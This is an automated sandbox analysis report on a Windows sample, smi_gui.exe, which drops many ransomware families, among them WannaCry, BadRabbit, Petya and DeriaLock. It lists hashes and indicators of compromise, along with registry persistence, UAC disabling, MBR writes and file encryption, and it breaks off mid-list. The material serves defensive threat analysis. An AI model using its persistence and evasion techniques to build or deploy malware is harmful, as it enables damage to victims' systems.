Analysis
-
max time kernel
615s -
max time network
617s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
27-08-2022 00:19
Static task
static1
Behavioral task
behavioral1
Sample
smi_gui.exe
Resource
win10v2004-20220812-en
General
-
Target
smi_gui.exe
-
Size
252KB
-
MD5
1d89bb27ef47c0b20d7d3738c72b7585
-
SHA1
db99aa51411357ee323c27c5889df35353820341
-
SHA256
e0d25e982293a424a36c37dd778100785d24e24a0318e2111b2991c3a1ace120
-
SHA512
99c98ff4af14d49e7ebceaf36842b3f024bcfa870509f64c6d7e3a2cf1fd6cfe548031b6c0823cbda602c57f9e3e8a15d804a6e8c527cd3d344357e23282d1a5
-
SSDEEP
1536:Ya+XUOlv4HjcDPEUrSUtD272tfiH149DPEUr0JDPE7r+:Ya+EGgHgDswtaru9DsrJDse
Malware Config
Extracted
C:\Program Files\WinRAR\Rar.txt
-n@inclist.txt
Extracted
C:\Program Files\WinRAR\WhatsNew.txt
https
http
http://weirdsgn.com
http://icondesignlab.com
https://rarlab.com/themes/WinRAR_Classic_48x36.theme.rar
Extracted
C:\Readme.txt
http://caforssztxqzf2nm.onion
Signatures
-
BadRabbit
Ransomware family discovered in late 2017, mainly targeting Russia and Ukraine.
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
Processes:
Endermanch@Birele.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Desktop\\Endermanch@Birele.exe" Endermanch@Birele.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe" reg.exe -
Modifies system executable filetype association 2 TTPs 8 IoCs
Processes:
uninstall.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} uninstall.exe -
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Wannacry
WannaCry is a ransomware cryptoworm.
-
Disables RegEdit via registry modification 2 IoCs
Processes:
Endermanch@Krotten.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Endermanch@Krotten.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Drops file in Drivers directory 5 IoCs
Processes:
Installer.exedescription ioc process File opened for modification C:\Windows\system32\DRIVERS\vlflt.sys Installer.exe File opened for modification C:\Windows\system32\drivers\trufos.sys Installer.exe File created C:\Windows\system32\drivers\trufos.sys Installer.exe File opened for modification C:\Windows\system32\DRIVERS\SET2EC8.tmp Installer.exe File created C:\Windows\system32\DRIVERS\SET2EC8.tmp Installer.exe -
Executes dropped EXE 49 IoCs
Processes:
bitdefender_tsecurity.exeagent_launcher.exebddeploy.exesetuppackage.exeinstaller.exewinrar-x64-611.exeProductAgentService.exebdredline.exeProductAgentService.exeProductAgentService.exeProductAgentService.exeProductAgentService.exeDiscoverySrv.exeDiscoverySrv.exeuninstall.exeProductAgentService.exeProductAgentUI.exeWatchDog.exeWinRAR.exewekDF21.tmpinstaller.exeInstaller.exeProductAgentUI.exeWinRAR.exeWinRAR.exeEndermanch@7ev3n.exesystem.exeEndermanch@BadRabbit.exeEndermanch@Birele.exeEndermanch@Cerber5.exeEndermanch@DeriaLock.exeEndermanch@InfinityCrypt.exeEndermanch@Krotten.exeEndermanch@NoMoreRansom.exeEndermanch@Petya.A.exeEndermanch@PolyRansom.exeEndermanch@PowerPoint.exeEndermanch@ViraLock.exeEndermanch@WannaCrypt0r.exeEndermanch@WinlockerVB6Blacksod.exeEndermanch@Xyeta.exeFantom.exesys3.exexMEwQkYA.exermAkUQYk.exeEndermanch@PolyRansom.exeEndermanch@ViraLock.exe6402.tmpsystem.exepid process 4420 bitdefender_tsecurity.exe 4016 agent_launcher.exe 3488 bddeploy.exe 4168 setuppackage.exe 4952 installer.exe 3728 winrar-x64-611.exe 4648 ProductAgentService.exe 1732 bdredline.exe 2752 ProductAgentService.exe 1228 ProductAgentService.exe 3040 ProductAgentService.exe 4440 ProductAgentService.exe 2516 DiscoverySrv.exe 2424 DiscoverySrv.exe 4484 uninstall.exe 752 ProductAgentService.exe 2480 ProductAgentUI.exe 1020 WatchDog.exe 4712 WinRAR.exe 716 wekDF21.tmp 4484 installer.exe 3504 Installer.exe 4268 ProductAgentUI.exe 1976 WinRAR.exe 3608 WinRAR.exe 4404 Endermanch@7ev3n.exe 4792 system.exe 4824 Endermanch@BadRabbit.exe 2868 Endermanch@Birele.exe 2304 Endermanch@Cerber5.exe 3496 Endermanch@DeriaLock.exe 644 Endermanch@InfinityCrypt.exe 4424 Endermanch@Krotten.exe 2068 Endermanch@NoMoreRansom.exe 3084 Endermanch@Petya.A.exe 3728 Endermanch@PolyRansom.exe 232 Endermanch@PowerPoint.exe 820 Endermanch@ViraLock.exe 1928 Endermanch@WannaCrypt0r.exe 4524 Endermanch@WinlockerVB6Blacksod.exe 2324 Endermanch@Xyeta.exe 1432 Fantom.exe 180 sys3.exe 1256 xMEwQkYA.exe 3776 rmAkUQYk.exe 5500 Endermanch@PolyRansom.exe 5560 Endermanch@ViraLock.exe 5624 6402.tmp 5892 system.exe -
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
Endermanch@DeriaLock.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\ResetStart.png.deria Endermanch@DeriaLock.exe File opened for modification C:\Users\Admin\Pictures\SearchUndo.raw.deria Endermanch@DeriaLock.exe File opened for modification C:\Users\Admin\Pictures\ConvertFromSync.raw.deria Endermanch@DeriaLock.exe File opened for modification C:\Users\Admin\Pictures\ExitConnect.crw.deria Endermanch@DeriaLock.exe File opened for modification C:\Users\Admin\Pictures\PopSubmit.png.deria Endermanch@DeriaLock.exe -
Registers COM server for autorun 1 TTPs 3 IoCs
Processes:
uninstall.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32 uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ = "C:\\Program Files\\WinRAR\\rarext.dll" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ThreadingModel = "Apartment" uninstall.exe -
Processes:
resource yara_rule behavioral1/memory/2868-222-0x0000000000400000-0x0000000000438000-memory.dmp upx behavioral1/memory/2868-228-0x0000000000400000-0x0000000000438000-memory.dmp upx behavioral1/memory/2068-225-0x0000000000400000-0x00000000005DE000-memory.dmp upx behavioral1/memory/2068-246-0x0000000000400000-0x00000000005DE000-memory.dmp upx behavioral1/memory/2868-262-0x0000000000400000-0x0000000000438000-memory.dmp upx behavioral1/memory/2324-255-0x0000000000400000-0x000000000044F000-memory.dmp upx -
Uses Session Manager for persistence 2 TTPs 1 IoCs
Creates Session Manager registry key to run executable early in system boot.
Processes:
Installer.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\BootExecute = 6100750074006f0063006800650063006b0020006100750074006f00630068006b0020002a0000000000 Installer.exe -
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Installer.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate Installer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Installer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Installer.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
bitdefender_tsecurity.exeagent_launcher.exewinrar-x64-611.exewekDF21.tmprundll32.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation bitdefender_tsecurity.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation agent_launcher.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation winrar-x64-611.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation wekDF21.tmp Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation rundll32.exe -
Drops startup file 1 IoCs
Processes:
Endermanch@DeriaLock.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LOGON.exe Endermanch@DeriaLock.exe -
Loads dropped DLL 64 IoCs
Processes:
installer.exeProductAgentService.exebdredline.exeProductAgentService.exeProductAgentService.exeProductAgentService.exeProductAgentService.exeDiscoverySrv.exeregsvr32.exeDiscoverySrv.exeProductAgentService.exeProductAgentUI.exepid process 4952 installer.exe 4952 installer.exe 4952 installer.exe 4952 installer.exe 4952 installer.exe 4648 ProductAgentService.exe 4648 ProductAgentService.exe 4952 installer.exe 1732 bdredline.exe 2752 ProductAgentService.exe 2752 ProductAgentService.exe 2752 ProductAgentService.exe 2752 ProductAgentService.exe 1228 ProductAgentService.exe 1228 ProductAgentService.exe 1228 ProductAgentService.exe 1228 ProductAgentService.exe 3040 ProductAgentService.exe 3040 ProductAgentService.exe 3040 ProductAgentService.exe 4952 installer.exe 3040 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4952 installer.exe 2516 DiscoverySrv.exe 2516 DiscoverySrv.exe 2516 DiscoverySrv.exe 2516 DiscoverySrv.exe 720 regsvr32.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 3040 ProductAgentService.exe 4440 ProductAgentService.exe 2424 DiscoverySrv.exe 2424 DiscoverySrv.exe 2424 DiscoverySrv.exe 2424 DiscoverySrv.exe 2424 DiscoverySrv.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4952 installer.exe 752 ProductAgentService.exe 752 ProductAgentService.exe 752 ProductAgentService.exe 752 ProductAgentService.exe 2480 ProductAgentUI.exe 2480 ProductAgentUI.exe 2480 ProductAgentUI.exe 2480 ProductAgentUI.exe 2480 ProductAgentUI.exe 2480 ProductAgentUI.exe 2480 ProductAgentUI.exe 2480 ProductAgentUI.exe 2480 ProductAgentUI.exe 2480 ProductAgentUI.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 11 IoCs
Processes:
Endermanch@Krotten.exeEndermanch@ViraLock.exeEndermanch@Birele.exereg.exeEndermanch@PolyRansom.exexMEwQkYA.exermAkUQYk.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\WINDOWS\\Web\\rundll32.exe" Endermanch@Krotten.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\AVPCC = "C:\\WINDOWS\\Cursors\\avp.exe" Endermanch@Krotten.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\rmAkUQYk.exe = "C:\\ProgramData\\yyosEMIQ\\rmAkUQYk.exe" Endermanch@ViraLock.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Endermanch@Birele.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Endermanch@Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xMEwQkYA.exe = "C:\\Users\\Admin\\vmkEcMcU\\xMEwQkYA.exe" Endermanch@PolyRansom.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xMEwQkYA.exe = "C:\\Users\\Admin\\vmkEcMcU\\xMEwQkYA.exe" xMEwQkYA.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\Desktop\\Endermanch@Birele.exe" Endermanch@Birele.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\rmAkUQYk.exe = "C:\\ProgramData\\yyosEMIQ\\rmAkUQYk.exe" rmAkUQYk.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
Endermanch@Cerber5.exedescription ioc process File opened (read-only) \??\t: Endermanch@Cerber5.exe File opened (read-only) \??\a: Endermanch@Cerber5.exe File opened (read-only) \??\b: Endermanch@Cerber5.exe File opened (read-only) \??\h: Endermanch@Cerber5.exe File opened (read-only) \??\l: Endermanch@Cerber5.exe File opened (read-only) \??\m: Endermanch@Cerber5.exe File opened (read-only) \??\q: Endermanch@Cerber5.exe File opened (read-only) \??\s: Endermanch@Cerber5.exe File opened (read-only) \??\x: Endermanch@Cerber5.exe File opened (read-only) \??\y: Endermanch@Cerber5.exe File opened (read-only) \??\i: Endermanch@Cerber5.exe File opened (read-only) \??\k: Endermanch@Cerber5.exe File opened (read-only) \??\p: Endermanch@Cerber5.exe File opened (read-only) \??\z: Endermanch@Cerber5.exe File opened (read-only) \??\g: Endermanch@Cerber5.exe File opened (read-only) \??\n: Endermanch@Cerber5.exe File opened (read-only) \??\v: Endermanch@Cerber5.exe File opened (read-only) \??\w: Endermanch@Cerber5.exe File opened (read-only) \??\e: Endermanch@Cerber5.exe File opened (read-only) \??\f: Endermanch@Cerber5.exe File opened (read-only) \??\j: Endermanch@Cerber5.exe File opened (read-only) \??\o: Endermanch@Cerber5.exe File opened (read-only) \??\r: Endermanch@Cerber5.exe File opened (read-only) \??\u: Endermanch@Cerber5.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 188 freegeoip.app -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
Endermanch@Krotten.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "DANGER" Endermanch@Krotten.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Äëÿ òîãî ÷òîáû âîññòàíîâèòü íîðìàëüíóþ ðàáîòó ñâîåãî êîìïüþòåðà íå ïîòåðÿâ ÂÑÞ èíôîðìàöèþ! È ñ ýêîíîìèâ äåíüãè, ïðèøëè ìíå íà e-mail wordsia@notrix.de êîä ïîïîëíåíèÿ ñ÷åòà êèåâñòàð íà 25 ãðèâåíü.  îòâåò â òå÷åíèå äâåíàäöàòè ÷àñîâ íà ñâîé e-mail òû ïîëó÷èøü ôàèë äëÿ óäàëåíèÿ ýòîé ïðîãðàììû." Endermanch@Krotten.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
Endermanch@PowerPoint.exesys3.exedescription ioc process File opened for modification \??\PHYSICALDRIVE0 Endermanch@PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 sys3.exe -
Drops file in System32 directory 48 IoCs
Processes:
DrvInst.exeDrvInst.exeDrvInst.exeDiscoverySrv.exeDrvInst.exedescription ioc process File opened for modification C:\Windows\System32\DriverStore\FileRepository\trufos.inf_amd64_e19961ad0f1621a3\trufos.cat DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft DiscoverySrv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EE44ECA143B76F2B9F2A5AA75B5D1EC6_847118BE2683F0C241D1D702F3A3F5F9 DiscoverySrv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CA4458E7366E94A3C3A9C1FE548B6D21_1593F3C3102A71FA61528AB81588ED09 DiscoverySrv.exe File created C:\Windows\System32\DriverStore\Temp\{b48447da-d9f0-654a-9e22-54f6569164b9}\SET14CA.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{b48447da-d9f0-654a-9e22-54f6569164b9}\SET14C9.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\trufos.inf_amd64_e19961ad0f1621a3\trufos.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{79ed3549-7623-484f-ba3a-5f1bb9ef229b}\SET2FB2.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\vlflt.inf_amd64_a5d44f8847918155\vlflt.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\vlflt.inf_amd64_a5d44f8847918155\vlflt.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\vlflt.inf_amd64_a5d44f8847918155 DrvInst.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache DiscoverySrv.exe File created C:\Windows\System32\DriverStore\Temp\{b48447da-d9f0-654a-9e22-54f6569164b9}\SET14B8.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\vlflt.inf_amd64_a5d44f8847918155\vlflt.cat DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{79ed3549-7623-484f-ba3a-5f1bb9ef229b} DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\vlflt.inf_amd64_a5d44f8847918155\vlflt.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{b48447da-d9f0-654a-9e22-54f6569164b9}\trufos.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{b48447da-d9f0-654a-9e22-54f6569164b9}\SET14C9.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{b48447da-d9f0-654a-9e22-54f6569164b9}\trufos.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{b48447da-d9f0-654a-9e22-54f6569164b9} DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{79ed3549-7623-484f-ba3a-5f1bb9ef229b}\SET2FB3.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{79ed3549-7623-484f-ba3a-5f1bb9ef229b}\vlflt.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\vlflt.inf_amd64_a5d44f8847918155\vlflt.sys DrvInst.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CA4458E7366E94A3C3A9C1FE548B6D21_1593F3C3102A71FA61528AB81588ED09 DiscoverySrv.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{b48447da-d9f0-654a-9e22-54f6569164b9}\SET14B8.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{b48447da-d9f0-654a-9e22-54f6569164b9}\Trufos.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\trufos.inf_amd64_e19961ad0f1621a3\Trufos.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\vlflt.inf_amd64_a5d44f8847918155\vlflt.cat DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{79ed3549-7623-484f-ba3a-5f1bb9ef229b}\SET2FB2.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{79ed3549-7623-484f-ba3a-5f1bb9ef229b}\vlflt.cat DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{79ed3549-7623-484f-ba3a-5f1bb9ef229b}\SET2FB4.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{79ed3549-7623-484f-ba3a-5f1bb9ef229b}\vlflt.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\trufos.inf_amd64_e19961ad0f1621a3\trufos.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\trufos.inf_amd64_e19961ad0f1621a3\trufos.cat DrvInst.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData DiscoverySrv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content DiscoverySrv.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{b48447da-d9f0-654a-9e22-54f6569164b9}\SET14CA.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\trufos.inf_amd64_e19961ad0f1621a3 DrvInst.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EE44ECA143B76F2B9F2A5AA75B5D1EC6_847118BE2683F0C241D1D702F3A3F5F9 DiscoverySrv.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{79ed3549-7623-484f-ba3a-5f1bb9ef229b}\SET2FB3.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{79ed3549-7623-484f-ba3a-5f1bb9ef229b}\SET2FB4.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\trufos.inf_amd64_e19961ad0f1621a3\Trufos.sys DrvInst.exe -
Drops file in Program Files directory 64 IoCs
Processes:
Endermanch@InfinityCrypt.exeinstaller.exeInstaller.exewinrar-x64-611.exeinstaller.exeProductAgentService.exedescription ioc process File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 Endermanch@InfinityCrypt.exe File created C:\Program Files\Bitdefender Agent\26.0.1.231\lang\vi-VN\productagentui.txtui installer.exe File opened for modification C:\Program Files\Bitdefender Agent\redline\bdredline.bdch.xml installer.exe File opened for modification C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\bdpretraining.dll Installer.exe File opened for modification C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\bdreinit.exe Installer.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Filters\tifffilt.dll.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\1033\VSTOInstallerUI.dll.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files\WinRAR\Uninstall.lst winrar-x64-611.exe File opened for modification C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-core-sysinfo-l1-1-0.dll Installer.exe File opened for modification C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\lang\pt-BR.txtui Installer.exe File opened for modification C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\packages\bd_commonfilesfolder.exe Installer.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 Endermanch@InfinityCrypt.exe File created C:\Program Files\Bitdefender Agent\26.0.1.231\installer\lang\pt-PT.txtui installer.exe File opened for modification C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-crt-conio-l1-1-0.dll Installer.exe File created C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-crt-stdio-l1-1-0.dll Installer.exe File opened for modification C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\mfc140.dll Installer.exe File opened for modification C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\vlflt.cat Installer.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\BIBUtils.dll.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 Endermanch@InfinityCrypt.exe File created C:\Program Files\Bitdefender Agent\26.0.1.231\lang\tr-TR\productagentui.txtui installer.exe File created C:\Program Files\Bitdefender Agent\26.0.1.231\skin\images\btn-close.svg installer.exe File opened for modification C:\Program Files\Bitdefender Agent\26.0.1.231\skin\images\minimize_hover.svg installer.exe File created C:\Program Files\Bitdefender Agent\26.0.1.231\skin\images\show-pass-checked.svg installer.exe File opened for modification C:\Program Files\WinRAR\UnRAR.exe winrar-x64-611.exe File created C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-crt-convert-l1-1-0.dll Installer.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\README_en_GB.txt.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 Endermanch@InfinityCrypt.exe File created C:\Program Files\Bitdefender Agent\26.0.1.231\skin\html\Agent\login2_no_net.html installer.exe File created C:\Program Files\Bitdefender Agent\26.0.1.231\skin\img\icons\b-icon-popup.svg installer.exe File created C:\Program Files\Bitdefender Agent\redline\bdnc.dll installer.exe File created C:\Program Files\Bitdefender Agent\26.0.1.231\installer\lang\es-ES.txtui installer.exe File created C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\lang\ro-RO.txtui installer.exe File created C:\Program Files\Bitdefender Agent\apps_data\com.bitdefender.cl ProductAgentService.exe File created 